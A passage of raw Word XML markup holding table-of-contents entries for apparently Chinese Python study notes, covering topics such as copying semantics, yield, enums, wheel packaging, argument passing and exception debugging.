        </w:p>
        <w:p w14:paraId="4B67BE11" w14:textId="0C794467" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779875" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>深拷贝浅拷贝及指针传递</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779875 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>438</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="65F3608C" w14:textId="07D9F279" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779876" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>接口类</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779876 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>439</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="44CBDAE9" w14:textId="79097EF4" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779877" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>导出</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>requirements.txt</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779877 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>440</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5B9A06BE" w14:textId="75EC1C2B" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779878" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>yield</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>用法</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779878 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>440</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3F0188A8" w14:textId="18CC375A" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779879" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>iter</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>用法</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779879 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>442</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="38E46282" w14:textId="45431E3A" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779880" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>enum</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779880 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>443</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2CA3E806" w14:textId="5D434A44" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779881" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>py</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>包</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>-</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>写</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>wheel</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779881 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>443</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2708FD02" w14:textId="7E28BB2C" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779882" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>不常见写法</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779882 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>451</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1EDEEC80" w14:textId="1AE14C02" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779883" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>函数传参中</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>*args</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>和</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>**kwargs</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>的区别</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779883 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>451</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6923BBDF" w14:textId="55A7D6E3" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779884" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>在类的</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>init</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>方法中把自己实例作为参数传递给其他方法</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779884 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>451</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1AEB3DE5" w14:textId="225C36E6" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779885" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>在函数中利用</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>args</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>互相进行传参</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779885 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>452</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4DB23289" w14:textId="3A84BD04" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779886" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>使用</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>or</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>的赋值语句</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779886 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>452</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4849A263" w14:textId="12B83A04" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779887" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>判断遍历是否被定义</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779887 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>453</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4BE78A07" w14:textId="12F022F5" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779888" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>接受多种异常</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779888 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>453</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0CA71520" w14:textId="53EAA76B" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779889" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>无法在析构函数使用</w:t>
            </w:r>
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>open</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779889 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>454</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="00E2134B" w14:textId="105B34A6" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779890" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>异常调试</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc159779890 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>454</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7C0ACD3B" w14:textId="3F6E2293" w:rsidR="009926EB" w:rsidRDefault="009926EB" w:rsidP="009222EB">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="8296"/>
            </w:tabs>
            <w:jc w:val="left"/>
            <w:rPr>
              <w:noProof/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc159779891" w:history="1">
            <w:r w:rsidRPr="00FD3362">
              <w:rPr>
                <w:rStyle w:val="a5"/>
                <w:noProof/>
              </w:rPr>
              <w:t>反编译，放置源码泄露</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
